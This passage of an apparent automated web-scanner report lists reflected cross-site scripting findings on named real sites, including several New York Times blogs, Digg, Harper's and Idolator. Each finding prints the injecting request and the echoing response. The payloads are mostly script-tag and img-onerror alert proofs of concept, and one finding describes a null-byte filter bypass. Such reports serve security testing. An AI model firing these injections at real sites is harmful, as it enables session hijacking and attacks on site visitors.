The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9cd7"><script>alert(1)</script>bd807b33336 was submitted in the src parameter. This input was echoed as c9cd7\"><script>alert(1)</script>bd807b33336 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/the-acquisition-of-tina-brown/?src=twrc9cd7"><script>alert(1)</script>bd807b33336 HTTP/1.1
Host: dealbook.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:02:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
+Kravis+Roberts;Stephen+Schwarzman;Stephen+A.+Schwarzman;Steve+Schwarzman;Blackstone+Group;barry-diller;iacinteractivecorp;media;newsweek;sidney-harman;the-daily-beast;tina-brown;top-headline-2&src=twrc9cd7\"><script>alert(1)</script>bd807b33336">
...[SNIP]...

3.126. http://digg.com/remote-submit [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/remote-submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b3e90"><script>alert(1)</script>9fa78c401ad was submitted in the REST URL parameter 1. This input was echoed as b3e90"><script>alert(1)</script>9fa78c401ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /remote-submit%00b3e90"><script>alert(1)</script>9fa78c401ad HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:02:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1943021764233658561%3A135; expires=Mon, 13-Dec-2010 02:02:25 GMT; path=/; domain=digg.com
Set-Cookie: d=aa91bb711c6bbb8366e494de8d7a0a35ee8a25c84136f625861f0473a8a6194c; expires=Thu, 12-Nov-2020 12:10:05 GMT; path=/; domain=.digg.com
X-Digg-Time: D=277115 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15225

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/remote-submit%00b3e90"><script>alert(1)</script>9fa78c401ad.rss">
...[SNIP]...

3.127. http://dinersjournal.blogs.nytimes.com/2010/11/12/using-root-vegetables-raw/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dinersjournal.blogs.nytimes.com
Path:	/2010/11/12/using-root-vegetables-raw/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0f91"><script>alert(1)</script>f1e4b0bb863 was submitted in the src parameter. This input was echoed as f0f91\"><script>alert(1)</script>f1e4b0bb863 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/using-root-vegetables-raw/?src=twrf0f91"><script>alert(1)</script>f1e4b0bb863 HTTP/1.1
Host: dinersjournal.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:02:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dinersjournal.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
eviews;Cooking;Eating;Wine;Restaurants;Recipes;Dining;Sifton;Bittman;Asimov;New+York;Bruni;The+New+York+Times;beets;brussels-sprouts;butternut-squash;cooking;general;home-cooking;the-minimalist&src=twrf0f91\"><script>alert(1)</script>f1e4b0bb863">
...[SNIP]...

3.128. http://economix.blogs.nytimes.com/2010/11/12/a-high-water-mark-for-profits/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://economix.blogs.nytimes.com
Path:	/2010/11/12/a-high-water-mark-for-profits/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ce27"><script>alert(1)</script>67611b927bc was submitted in the src parameter. This input was echoed as 3ce27\"><script>alert(1)</script>67611b927bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/a-high-water-mark-for-profits/?src=twr3ce27"><script>alert(1)</script>67611b927bc HTTP/1.1
Host: economix.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:02:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://economix.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76894

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
MNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Economics;Economy;Economics+Policy;Economics+Reports;Business;corporate-profits;forecasts;joseph-a-lavorgna;unemployment&src=twr3ce27\"><script>alert(1)</script>67611b927bc">
...[SNIP]...

3.129. http://frugaltraveler.blogs.nytimes.com/2010/10/19/does-jetblues-all-you-can-jet-pass-fill-you-up-users-respond/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://frugaltraveler.blogs.nytimes.com
Path:	/2010/10/19/does-jetblues-all-you-can-jet-pass-fill-you-up-users-respond/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6df23"><script>alert(1)</script>267493e97ac was submitted in the src parameter. This input was echoed as 6df23\"><script>alert(1)</script>267493e97ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/10/19/does-jetblues-all-you-can-jet-pass-fill-you-up-users-respond/?src=mv6df23"><script>alert(1)</script>267493e97ac&ref=travel HTTP/1.1
Host: frugaltraveler.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:02:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://frugaltraveler.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 65638

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
ft7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Budget+Travel;Discount+Travel;Cheap+Travel;Travel;Travel+Tips;Travel+Advice;jetblue&src=mv6df23\"><script>alert(1)</script>267493e97ac">
...[SNIP]...

3.130. http://frugaltraveler.blogs.nytimes.com/2010/11/02/a-guide-to-the-caribbean-on-a-budget/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://frugaltraveler.blogs.nytimes.com
Path:	/2010/11/02/a-guide-to-the-caribbean-on-a-budget/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99fa0"><script>alert(1)</script>3ce9920fcd7 was submitted in the src parameter. This input was echoed as 99fa0\"><script>alert(1)</script>3ce9920fcd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/02/a-guide-to-the-caribbean-on-a-budget/?src=me99fa0"><script>alert(1)</script>3ce9920fcd7&ref=travel HTTP/1.1
Host: frugaltraveler.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:02:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://frugaltraveler.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 65077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
Left6,Left7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Budget+Travel;Discount+Travel;Cheap+Travel;Travel;Travel+Tips;Travel+Advice&src=me99fa0\"><script>alert(1)</script>3ce9920fcd7">
...[SNIP]...

3.131. http://frugaltraveler.blogs.nytimes.com/2010/11/10/biking-los-angeles/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://frugaltraveler.blogs.nytimes.com
Path:	/2010/11/10/biking-los-angeles/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af2ec"><script>alert(1)</script>8d7a351f0ef was submitted in the src parameter. This input was echoed as af2ec\"><script>alert(1)</script>8d7a351f0ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/10/biking-los-angeles/?src=mvaf2ec"><script>alert(1)</script>8d7a351f0ef&ref=travel HTTP/1.1
Host: frugaltraveler.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:02:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://frugaltraveler.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
eft9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Budget+Travel;Discount+Travel;Cheap+Travel;Travel;Travel+Tips;Travel+Advice;biking;los-angeles&src=mvaf2ec\"><script>alert(1)</script>8d7a351f0ef">
...[SNIP]...

3.132. http://gadgetwise.blogs.nytimes.com/2010/11/12/ipad-apps-that-provide-recipes-and-avoid-strife/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gadgetwise.blogs.nytimes.com
Path:	/2010/11/12/ipad-apps-that-provide-recipes-and-avoid-strife/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0dd9"><script>alert(1)</script>ffceabef99c was submitted in the src parameter. This input was echoed as f0dd9\"><script>alert(1)</script>ffceabef99c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/ipad-apps-that-provide-recipes-and-avoid-strife/?src=twrf0dd9"><script>alert(1)</script>ffceabef99c HTTP/1.1
Host: gadgetwise.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:02:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://gadgetwise.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 63517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
w3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Electronics;Gadgets;Personal+Tech;New+Technology;New+Technology+Products;allrecipes;epicurious;ipad;ipad;mobile-tech&src=twrf0dd9\"><script>alert(1)</script>ffceabef99c">
...[SNIP]...

3.133. http://harpers.org/subjects/Sentences [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://harpers.org
Path:	/subjects/Sentences

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4564a"><img%20src%3da%20onerror%3dalert(1)>34f47c9c810 was submitted in the REST URL parameter 2. This input was echoed as 4564a"><img src=a onerror=alert(1)>34f47c9c810 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /subjects/Sentences4564a"><img%20src%3da%20onerror%3dalert(1)>34f47c9c810 HTTP/1.1
Host: harpers.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 01:29:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Cache-Control: max-age=14400
Expires: Sat, 13 Nov 2010 05:29:36 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 6802
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-eq
...[SNIP]...
<input type="hidden" name="source" value="/subjects/Sentences4564a"><img src=a onerror=alert(1)>34f47c9c810" />
...[SNIP]...

3.134. http://idolator.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4566"><script>alert(1)</script>90fff6bafdf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4566\"><script>alert(1)</script>90fff6bafdf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f4566"><script>alert(1)</script>90fff6bafdf=1 HTTP/1.1
Host: idolator.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:04:54 GMT
Server: Apache
Set-Cookie: GEOIP_COUNTRY_CODE=US; path=/; domain=idolator.com
X-Powered-By: PHP/5.3.3
Vary: Cookie
X-Pingback: http://idolator.com/xmlrpc.php
Set-Cookie: PHPSESSID=0fea5498bc1e06749b73cf9da169255d; path=/
Last-Modified: Fri, 12 Nov 2010 18:04:55 -0800
Cache-Control: max-age=300, must-revalidate
Keep-Alive: timeout=5, max=1
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 88149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/?f4566\"><script>alert(1)</script>90fff6bafdf=1" />
...[SNIP]...

3.135. http://intransit.blogs.nytimes.com/2010/09/15/show-us-your-city/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://intransit.blogs.nytimes.com
Path:	/2010/09/15/show-us-your-city/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9c00"><script>alert(1)</script>03798aac80c was submitted in the src parameter. This input was echoed as d9c00\"><script>alert(1)</script>03798aac80c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/09/15/show-us-your-city/?src=mvd9c00"><script>alert(1)</script>03798aac80c&ref=travel HTTP/1.1
Host: intransit.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:05:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://intransit.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 59592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
ft7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Travel+Tips;Travel+Advice;Travel;Deals;Travel+News;Updates.;show-us-your-city;video&src=mvd9c00\"><script>alert(1)</script>03798aac80c">
...[SNIP]...

3.136. http://intransit.blogs.nytimes.com/2010/11/11/prague-art-show-embraces-decadence/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://intransit.blogs.nytimes.com
Path:	/2010/11/11/prague-art-show-embraces-decadence/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b807"><script>alert(1)</script>1aa3eacb6c4 was submitted in the src parameter. This input was echoed as 7b807\"><script>alert(1)</script>1aa3eacb6c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/11/prague-art-show-embraces-decadence/?src=mv7b807"><script>alert(1)</script>1aa3eacb6c4&ref=travel HTTP/1.1
Host: intransit.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:05:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://intransit.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 58574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Travel+Tips;Travel+Advice;Travel;Deals;Travel+News;Updates.;art;globespotters;prague;prague&src=mv7b807\"><script>alert(1)</script>1aa3eacb6c4">
...[SNIP]...

3.137. http://intransit.blogs.nytimes.com/2010/11/11/qa-adding-angkor-to-a-vietnam-bike-trip/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://intransit.blogs.nytimes.com
Path:	/2010/11/11/qa-adding-angkor-to-a-vietnam-bike-trip/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93df7"><script>alert(1)</script>78bd648be4f was submitted in the src parameter. This input was echoed as 93df7\"><script>alert(1)</script>78bd648be4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/11/qa-adding-angkor-to-a-vietnam-bike-trip/?src=me93df7"><script>alert(1)</script>78bd648be4f&ref=travel HTTP/1.1
Host: intransit.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:05:18 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://intransit.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 56967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
5,Left6,Left7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Travel+Tips;Travel+Advice;Travel;Deals;Travel+News;Updates.;q-a;siem-reap&src=me93df7\"><script>alert(1)</script>78bd648be4f">
...[SNIP]...

3.138. http://intransit.blogs.nytimes.com/2010/11/12/japans-high-speed-trains-lines-expand/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://intransit.blogs.nytimes.com
Path:	/2010/11/12/japans-high-speed-trains-lines-expand/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff1af"><script>alert(1)</script>c890c53b0a0 was submitted in the src parameter. This input was echoed as ff1af\"><script>alert(1)</script>c890c53b0a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/japans-high-speed-trains-lines-expand/?src=mvff1af"><script>alert(1)</script>c890c53b0a0&ref=travel HTTP/1.1
Host: intransit.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:05:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://intransit.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 52981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
ft3,Left4,Left5,Left6,Left7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Travel+Tips;Travel+Advice;Travel;Deals;Travel+News;Updates.&src=mvff1af\"><script>alert(1)</script>c890c53b0a0">
...[SNIP]...

3.139. http://intransit.blogs.nytimes.com/2010/11/12/paris-photo-fair-covers-the-spectrum/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://intransit.blogs.nytimes.com
Path:	/2010/11/12/paris-photo-fair-covers-the-spectrum/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8307"><script>alert(1)</script>b0e62f7972a was submitted in the src parameter. This input was echoed as f8307\"><script>alert(1)</script>b0e62f7972a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/paris-photo-fair-covers-the-spectrum/?src=mef8307"><script>alert(1)</script>b0e62f7972a&ref=travel HTTP/1.1
Host: intransit.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:05:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://intransit.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 56822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
MNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Travel+Tips;Travel+Advice;Travel;Deals;Travel+News;Updates.;festivals;globespotters;paris;paris;photography&src=mef8307\"><script>alert(1)</script>b0e62f7972a">
...[SNIP]...

3.140. http://intransit.blogs.nytimes.com/2010/11/12/sunday-preview-66/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://intransit.blogs.nytimes.com
Path:	/2010/11/12/sunday-preview-66/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6db75"><script>alert(1)</script>d8711375637 was submitted in the src parameter. This input was echoed as 6db75\"><script>alert(1)</script>d8711375637 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/sunday-preview-66/?src=twr6db75"><script>alert(1)</script>d8711375637 HTTP/1.1
Host: intransit.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:04:59 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://intransit.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 52105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
t3,Left4,Left5,Left6,Left7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Travel+Tips;Travel+Advice;Travel;Deals;Travel+News;Updates.&src=twr6db75\"><script>alert(1)</script>d8711375637">
...[SNIP]...

3.141. http://lens.blogs.nytimes.com/2010/11/12/pictures-of-the-day-afghanistan-and-elsewhere-6/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://lens.blogs.nytimes.com
Path:	/2010/11/12/pictures-of-the-day-afghanistan-and-elsewhere-6/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80454"><script>alert(1)</script>433d57f0df7 was submitted in the src parameter. This input was echoed as 80454\"><script>alert(1)</script>433d57f0df7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/pictures-of-the-day-afghanistan-and-elsewhere-6/?src=twr80454"><script>alert(1)</script>433d57f0df7 HTTP/1.1
Host: lens.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:05:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://lens.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
ali;armando-franca;athar-hussain;carlos-barria;christoph-bangert;doug-mills;emilio-morenatti;hassan-ammar;john-woods;marcia-allert;merrill-d-oliver;pictures-of-the-day;rafiq-maqbool;saurabh-das&src=twr80454\"><script>alert(1)</script>433d57f0df7">
...[SNIP]...

